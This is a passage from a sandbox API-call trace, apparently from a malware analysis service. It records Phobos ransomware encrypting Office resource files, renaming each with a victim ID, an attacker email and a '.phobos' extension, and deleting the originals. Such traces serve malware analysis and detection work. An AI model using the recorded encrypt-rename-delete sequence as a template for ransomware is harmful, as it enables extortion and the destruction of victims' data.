lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0168.396] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0168.396] CloseHandle (hObject=0x17c) returned 1 [0168.396] CloseHandle (hObject=0x148) returned 1 [0168.396] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll")) returned 1 [0168.400] SetEvent (hEvent=0xe8) returned 1 [0168.400] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0168.400] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0168.401] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2827616) returned 1 [0168.401] CloseHandle (hObject=0x148) returned 1 [0168.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll")) returned 0x2020 [0168.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0168.402] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0168.402] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0168.402] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0168.402] ReadFile (in: hFile=0x148, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0168.797] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xe61ca, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0168.797] ReadFile (in: hFile=0x148, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0168.918] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x272560, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0168.918] ReadFile (in: hFile=0x148, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0172.082] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32c68) returned 1 [0172.082] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0172.082] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0070) returned 1 [0172.088] CryptDestroyKey (hKey=0xa32c68) returned 1 [0172.088] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0172.088] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0122, lpOverlapped=0x0) returned 1 [0172.673] SetEndOfFile (hFile=0x148) returned 1 [0172.673] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x272560, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0172.673] WriteFile (in: hFile=0x148, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0172.675] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xe61ca, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0172.675] WriteFile (in: hFile=0x148, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0172.678] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0172.678] WriteFile (in: hFile=0x148, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0172.679] CloseHandle (hObject=0x148) returned 1 [0172.679] SetEvent (hEvent=0xe8) returned 1 [0172.679] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0172.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0172.679] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=360288) returned 1 [0172.680] CloseHandle (hObject=0x148) returned 1 [0172.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll")) returned 0x2020 [0172.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0172.680] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0172.680] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0172.680] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0172.680] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0172.680] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0172.680] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0172.680] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x57f60, lpOverlapped=0x0) returned 1 [0172.778] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x57f70, dwBufLen=0x57f70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x57f70) returned 1 [0172.781] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x57f70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x57f70, lpOverlapped=0x0) returned 1 [0172.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0172.788] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0172.788] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0172.789] CryptDestroyKey (hKey=0xa32d28) returned 1 [0172.789] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0172.789] CryptDestroyKey (hKey=0xa32c68) returned 1 [0172.789] CloseHandle (hObject=0x148) returned 1 [0172.789] CloseHandle (hObject=0x180) returned 1 [0172.789] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll")) returned 1 [0172.792] SetEvent (hEvent=0xe8) returned 1 [0172.792] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0172.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0172.793] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=13152) returned 1 [0172.793] CloseHandle (hObject=0x180) returned 1 [0172.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll")) returned 0x2020 [0172.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0172.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0172.859] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0172.860] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0172.860] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0172.860] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0172.860] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0172.860] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3360, lpOverlapped=0x0) returned 1 [0173.027] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3370, dwBufLen=0x3370 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3370) returned 1 [0173.027] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3370, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3370, lpOverlapped=0x0) returned 1 [0173.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0173.028] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.028] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0173.028] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.028] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0173.028] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0173.028] CloseHandle (hObject=0x180) returned 1 [0173.028] CloseHandle (hObject=0x17c) returned 1 [0173.028] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll")) returned 1 [0173.030] SetEvent (hEvent=0xe8) returned 1 [0173.030] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0173.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0173.030] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=473440) returned 1 [0173.030] CloseHandle (hObject=0x17c) returned 1 [0173.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll")) returned 0x2020 [0173.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0173.031] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.031] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.031] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0173.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0173.033] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x73960, lpOverlapped=0x0) returned 1 [0173.272] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x73970, dwBufLen=0x73970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x73970) returned 1 [0173.275] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x73970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x73970, lpOverlapped=0x0) returned 1 [0173.284] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0173.284] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.284] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0173.284] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.284] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0173.284] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0173.284] CloseHandle (hObject=0x17c) returned 1 [0173.284] CloseHandle (hObject=0x180) returned 1 [0173.284] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll")) returned 1 [0173.289] SetEvent (hEvent=0xe8) returned 1 [0173.289] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0173.289] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0173.289] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=148320) returned 1 [0173.289] CloseHandle (hObject=0x180) returned 1 [0173.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll")) returned 0x2020 [0173.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.290] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0173.290] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.290] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.290] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0173.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0173.290] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.290] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x24360, lpOverlapped=0x0) returned 1 [0173.650] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x24370, dwBufLen=0x24370 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x24370) returned 1 [0173.659] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x24370, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x24370, lpOverlapped=0x0) returned 1 [0173.663] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0173.663] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.663] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0173.663] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.663] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0173.663] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0173.663] CloseHandle (hObject=0x180) returned 1 [0173.663] CloseHandle (hObject=0x17c) returned 1 [0173.663] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll")) returned 1 [0173.666] SetEvent (hEvent=0xe8) returned 1 [0173.666] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0173.666] CreateFileW 